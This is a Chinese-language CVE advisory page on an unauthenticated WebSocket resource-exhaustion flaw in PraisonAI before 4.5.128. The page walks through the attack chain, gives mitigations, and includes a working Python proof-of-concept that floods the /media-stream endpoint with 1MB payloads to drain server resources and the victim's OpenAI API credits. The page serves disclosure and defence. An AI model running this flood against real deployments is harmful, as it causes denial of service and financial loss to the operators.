CVE-2026-40116 CVSS 7.5 高危

CVE-2026-40116 PraisonAI资源耗尽漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40116

漏洞类型

资源耗尽

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PraisonAI

漏洞概述

PraisonAI是一个多代理团队系统。在4.5.128版本之前，其调用模块中的/media-stream WebSocket端点存在严重安全漏洞。该端点在未进行身份验证或Twilio签名验证的情况下接受任意客户端连接。每个连接都会使用服务器的API密钥打开经过身份验证的OpenAI Realtime API会话。由于系统未对并发连接数、消息速率或消息大小实施任何限制，未经身份验证的攻击者可以轻松耗尽服务器资源，并恶意消耗受害者的OpenAI API额度，造成服务拒绝和财务损失。

技术细节

该漏洞源于PraisonAI的/media-stream WebSocket接口缺乏有效的访问控制与资源管理机制。具体来说，该接口未实施身份验证检查，也未验证Twilio签名，导致攻击者无需凭证即可建立连接。一旦连接建立，服务器会利用自身的OpenAI API密钥向OpenAI Realtime API发起代理请求。由于缺乏并发连接数限制、消息频率限制及消息大小限制，攻击者可通过脚本建立大量WebSocket连接并发送海量数据。这直接导致目标服务器的CPU、内存及带宽资源耗尽，同时因OpenAI API按量计费的特性，导致受害者API积分被迅速耗尽。这种资源耗尽攻击不仅会导致系统服务不可用，还会造成直接的经济损失。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标运行的是PraisonAI应用，且版本低于4.5.128。

STEP 2

2. 发起未授权连接

攻击者直接向目标服务器的/media-stream WebSocket端点发起连接请求，无需提供任何凭证或签名。

STEP 3

3. 建立代理会话

服务器接受连接，并使用自身的OpenAI API密钥为该连接建立与OpenAI Realtime API的认证会话。

STEP 4

4. 资源耗尽攻击

攻击者通过脚本开启大量并发连接，或发送高频率、大体积的数据包，迫使服务器消耗大量资源处理请求并向OpenAI API付费。

STEP 5

5. 达成拒绝服务

服务器资源（带宽、内存、CPU）被耗尽，OpenAI API额度被清零，导致合法用户无法访问服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import asyncio
import websockets

async def exploit(target_url):
    # Target the vulnerable WebSocket endpoint
    uri = f"{target_url}/media-stream"
    print(f"[+] Connecting to {uri}...")

    try:
        # Establish connection without authentication
        async with websockets.connect(uri) as websocket:
            print("[+] Connection established. Starting flood...")
            
            # Create a large payload to consume bandwidth and memory
            payload = "A" * 1024 * 1024  # 1MB payload
            
            while True:
                # Send data continuously to drain resources and API credits
                await websocket.send(payload)
                print("[+] Packet sent: Resource draining...")
                await asyncio.sleep(0.1)
                
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL (e.g., http://localhost:8000)
    target = "ws://127.0.0.1:8000"
    asyncio.run(exploit(target))

影响范围

PraisonAI < 4.5.128

防御指南

临时缓解措施

如果无法立即升级，建议通过网络访问控制列表（ACL）或Web应用防火墙（WAF）阻断外部对/media-stream路径的访问，仅允许内部受信任服务调用，以防止未授权的资源消耗攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表